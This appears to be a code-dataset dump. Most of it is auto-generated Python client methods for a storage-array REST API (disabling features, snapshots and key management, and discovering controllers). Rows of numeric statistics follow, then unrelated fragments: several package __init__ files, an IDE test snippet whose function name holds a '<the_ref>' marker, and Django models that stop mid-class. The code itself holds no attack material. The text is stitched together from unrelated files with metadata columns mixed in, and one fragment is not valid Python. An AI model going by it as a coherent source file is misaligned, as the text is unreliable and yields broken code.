if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_asup`")
resource_path = '/storage-systems/{system-id}/symbol/disableASUP'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_disable_external_kms(self, system_id, body, **kwargs):
"""
Disables external KMS.
Documented return codes: ok, externalKmsNotEnabled, cannotDisableNoKey, externalKmsDisabledNoKey.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_disable_external_kms(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: WrappedLockKeyReturn
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_disable_external_kms" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_external_kms`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_disable_external_kms`")
resource_path = '/storage-systems/{system-id}/symbol/disableExternalKMS'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WrappedLockKeyReturn',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_disable_feature(self, system_id, body, **kwargs):
"""
Disable a single add-on(optional feature
Documented return codes: ok, error, invalidSafeCapability, disableNotPermitted.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_disable_feature(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: The Capability value for the \"premium\" feature to be disabled. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_disable_feature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_feature`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_disable_feature`")
resource_path = '/storage-systems/{system-id}/symbol/disableFeature'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_disable_feature_by_ref(self, system_id, body, **kwargs):
"""
This procedure disables a feature.
Documented return codes: uninitialized, ok, error, illegalParam, noHeap, disableNotPermitted, disableEvaluationFeatureNotPermitted, invalidFeatureref.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_disable_feature_by_ref(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: A reference to the feature to disable. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_disable_feature_by_ref" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_feature_by_ref`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_disable_feature_by_ref`")
resource_path = '/storage-systems/{system-id}/symbol/disableFeatureByRef'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_disable_flash_cache_volume(self, system_id, body, **kwargs):
"""
This procedure deletes the proxy and turns off flash cache volume attributes on the referenced user volume.
Documented return codes: ok, error, illegalParam, noHeap, volumeNotExist, internalError, invalidVolumeref, notFlashcacheVol, flashcacheDeleted.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_disable_flash_cache_volume(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: A reference to the volume to disable. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_disable_flash_cache_volume" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_flash_cache_volume`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_disable_flash_cache_volume`")
resource_path = '/storage-systems/{system-id}/symbol/disableFlashCacheVolume'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_disable_snapshot(self, system_id, body, **kwargs):
"""
This procedure will disable (stop) the indicated snapshot volume.
Documented return codes: ok, illegalParam, noHeap, tryAlternate, internalError, invalidVolumeref, snapNotAvailable, notDisabled, repositoryOffline, ghostVolume, repositoryMissing, repositoryFailed, baseVolumeFailed, baseVolumeOffline.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_disable_snapshot(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: The SnapshotRef of the snapshot volume on which the operation is to be performed. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_disable_snapshot" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_snapshot`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_disable_snapshot`")
resource_path = '/storage-systems/{system-id}/symbol/disableSnapshot'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_disable_snapshot_collection(self, system_id, body, **kwargs):
"""
This procedure will disable (stop) each snapshot volume identified in the argument list. Validation checks for necessary snapshot-disable preconditions are performed prior to disabling any snapshot; if any of the requested snapshots do not meet the preconditions to be disabled, the entire command will be failed and no snapshots will be disabled. If command validation succeeds for all snapshots in the list, but one or more of the snapshots in the list fails to be disabled, the entire command will be failed and no snapshots will be disabled. Requests to disable an already-disabled Snapshot will be treated as no-ops and will be considered successful.
Documented return codes: ok, illegalParam, noHeap, internalError, invalidVolumeref, snapNotAvailable, notDisabled, repositoryOffline, ghostVolume, repositoryMissing, repositoryFailed, baseVolumeFailed, baseVolumeOffline.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_disable_snapshot_collection(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param SnapshotRefList body: A SnapshotRefList structure identifying the snapshot volume that are to be disabled. The list may contain as few as one snapshot reference or up to MAX_SNAPSHOT_COLLECTION_SIZE references. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_disable_snapshot_collection" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_snapshot_collection`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_disable_snapshot_collection`")
resource_path = '/storage-systems/{system-id}/symbol/disableSnapshotCollection'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_disable_volume_protection_information(self, system_id, body, **kwargs):
"""
Disables protection information (PI) usage for the specified volume.
Documented return codes: ok, volumeHasSnapshotRelationship, volumeHasMirrorRelationship, volumeHasVolcopyRelationship.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_disable_volume_protection_information(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_disable_volume_protection_information" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_disable_volume_protection_information`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_disable_volume_protection_information`")
resource_path = '/storage-systems/{system-id}/symbol/disableVolumeProtectionInformation'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_discover_controllers(self, system_id, **kwargs):
"""
Returns a DiscoveryResponse object that identifies the storage arrays and controllers known to the RPC server that handles this request. Response also indicates if RPC server is RAID controller or SYMbol RPC UTM agent.
Documented return codes: ok.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_discover_controllers(system_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: DiscoveryResponse
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_discover_controllers" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_discover_controllers`")
resource_path = '/storage-systems/{system-id}/symbol/discoverControllers'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DiscoveryResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
| 39.02334
| 845
| 0.52609
| 18,373
| 193,946
| 5.384804
| 0.034072
| 0.038813
| 0.032344
| 0.021024
| 0.917845
| 0.909254
| 0.901926
| 0.889382
| 0.876838
| 0.870541
| 0
| 0.001124
| 0.403911
| 193,946
| 4,969
| 846
| 39.031193
| 0.854639
| 0.315789
| 0
| 0.870852
| 0
| 0
| 0.205608
| 0.06867
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020929
| false
| 0
| 0.003063
| 0
| 0.044921
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cab4766598e999eebf3eefc09a9aa642b8d3c8d6
| 191
|
py
|
Python
|
great_expectations/expectations/metrics/column_pair_map_metrics/__init__.py
|
vanderGoes/great_expectations
|
9790cd992a8a4de672c640e89ddd7278a0ca0889
|
[
"Apache-2.0"
] | 6,451
|
2017-09-11T16:32:53.000Z
|
2022-03-31T23:27:49.000Z
|
great_expectations/expectations/metrics/column_pair_map_metrics/__init__.py
|
vanderGoes/great_expectations
|
9790cd992a8a4de672c640e89ddd7278a0ca0889
|
[
"Apache-2.0"
] | 3,892
|
2017-09-08T18:57:50.000Z
|
2022-03-31T23:15:20.000Z
|
great_expectations/expectations/metrics/column_pair_map_metrics/__init__.py
|
vanderGoes/great_expectations
|
9790cd992a8a4de672c640e89ddd7278a0ca0889
|
[
"Apache-2.0"
] | 1,023
|
2017-09-08T15:22:05.000Z
|
2022-03-31T21:17:08.000Z
|
from .column_pair_values_equal import ColumnPairValuesEqual
from .column_pair_values_greater import ColumnPairValuesAGreaterThanB
from .column_pair_values_in_set import ColumnPairValuesInSet
| 47.75
| 69
| 0.921466
| 22
| 191
| 7.545455
| 0.545455
| 0.180723
| 0.253012
| 0.361446
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062827
| 191
| 3
| 70
| 63.666667
| 0.927374
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cad6baa9afa72874f165b4b9b259949bfeae59f3
| 116
|
py
|
Python
|
python/testData/quickdoc/ReturnTypeWrappedBecauseOfFunctionName.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/quickdoc/ReturnTypeWrappedBecauseOfFunctionName.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/quickdoc/ReturnTypeWrappedBecauseOfFunctionName.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def fu<the_ref>nc01234567890123456789012345678901234567890123456789012345678901234567890123456789() -> int:
pass
| 58
| 107
| 0.87069
| 7
| 116
| 14.285714
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.740741
| 0.068966
| 116
| 2
| 108
| 58
| 0.185185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0.5
| 0
| null | null | 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
1b3d942244741ecc4b1ea952bf7952ef13e4c4b7
| 130
|
py
|
Python
|
PSMNet-FRR/models/__init__.py
|
TaooCAI/FRR
|
b49e2a0598df3284f8e46cf6e01fbd7202ffa4c7
|
[
"MIT"
] | null | null | null |
PSMNet-FRR/models/__init__.py
|
TaooCAI/FRR
|
b49e2a0598df3284f8e46cf6e01fbd7202ffa4c7
|
[
"MIT"
] | null | null | null |
PSMNet-FRR/models/__init__.py
|
TaooCAI/FRR
|
b49e2a0598df3284f8e46cf6e01fbd7202ffa4c7
|
[
"MIT"
] | null | null | null |
from .basic import PSMNet as basic
from .stackhourglass import PSMNet as stackhourglass
from .stereoSRR import PSMNet as stereoSRR
| 43.333333
| 52
| 0.846154
| 18
| 130
| 6.111111
| 0.388889
| 0.327273
| 0.381818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130769
| 130
| 3
| 53
| 43.333333
| 0.973451
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1b646ed79aaa6c4b98c9c4939c61ed17741dceb6
| 154
|
py
|
Python
|
python/taichi/linalg/__init__.py
|
gaoxinge/taichi
|
86d403f071b8505858763d4712b37cd71b89db91
|
[
"MIT"
] | 1
|
2020-11-10T07:17:01.000Z
|
2020-11-10T07:17:01.000Z
|
python/taichi/linalg/__init__.py
|
gaoxinge/taichi
|
86d403f071b8505858763d4712b37cd71b89db91
|
[
"MIT"
] | 1
|
2020-08-24T05:18:43.000Z
|
2020-08-24T05:18:43.000Z
|
python/taichi/linalg/__init__.py
|
gaoxinge/taichi
|
86d403f071b8505858763d4712b37cd71b89db91
|
[
"MIT"
] | null | null | null |
"""Taichi support module for sparse matrix operations.
"""
from taichi.linalg.sparse_matrix import *
from taichi.linalg.sparse_solver import SparseSolver
| 30.8
| 54
| 0.818182
| 20
| 154
| 6.2
| 0.6
| 0.193548
| 0.258065
| 0.354839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103896
| 154
| 4
| 55
| 38.5
| 0.898551
| 0.331169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1b6f7123643ee59a056b9f550ba28d9dccc2f88b
| 12,773
|
py
|
Python
|
inventario/models.py
|
vvilche1/odin
|
ca24e727d94b34b33eb51de50fbcc8a5505cc559
|
[
"Apache-2.0"
] | null | null | null |
inventario/models.py
|
vvilche1/odin
|
ca24e727d94b34b33eb51de50fbcc8a5505cc559
|
[
"Apache-2.0"
] | null | null | null |
inventario/models.py
|
vvilche1/odin
|
ca24e727d94b34b33eb51de50fbcc8a5505cc559
|
[
"Apache-2.0"
] | null | null | null |
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey has `on_delete` set to the desired behavior.
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from django.db import models
class Campus(models.Model):
id_cam = models.AutoField(primary_key=True)
nombre = models.CharField(unique=True, max_length=100)
direccion = models.CharField(max_length=100)
cpostal = models.CharField(max_length=20)
fono = models.CharField(max_length=20)
email = models.CharField(max_length=100)
ubicacion = models.CharField(max_length=100)
abreviatura = models.CharField(max_length=4)
descripcion = models.CharField(max_length=800)
def __str__(self):
return self.nombre
class Meta:
managed = False
db_table = 'campus'
class Usuario(models.Model):
id_cam = models.ForeignKey(Campus, models.DO_NOTHING, db_column='id_cam')
idusuario = models.AutoField(primary_key=True)
nombre = models.CharField(max_length=35)
rut = models.IntegerField()
password = models.CharField(max_length=35)
def __str__(self):
return self.nombre
class Meta:
managed = False
db_table = 'usuario'
class Resp(models.Model):
idinventario_resp = models.PositiveIntegerField(primary_key=True)
total_items = models.IntegerField()
total_items_inventariados = models.IntegerField()
total_items_en_prestamos_permanente = models.IntegerField()
total_items_en_morosos_alumnos = models.IntegerField()
total_items_morosos_academicos = models.IntegerField()
total_items_morosos_funcionarios = models.IntegerField()
total_items_morosos_postgrado = models.IntegerField()
total_items_morosos_pib = models.IntegerField()
total_items_extraviados = models.IntegerField()
total_items_perdidos = models.IntegerField()
total_items_inutilizados = models.IntegerField()
total_items_deteriorados_para_empastar = models.IntegerField()
total_items_transito = models.IntegerField()
total_items_problemas_de_catalogacion = models.IntegerField()
total_items_faltantes = models.IntegerField()
class Meta:
managed = False
db_table = 'resp'
class Issue(models.Model):
idinventario_issue = models.PositiveIntegerField(primary_key=True)
total_items = models.IntegerField()
total_items_inventariados = models.IntegerField()
total_items_en_prestamos_permanente = models.IntegerField()
total_items_en_morosos_alumnos = models.IntegerField()
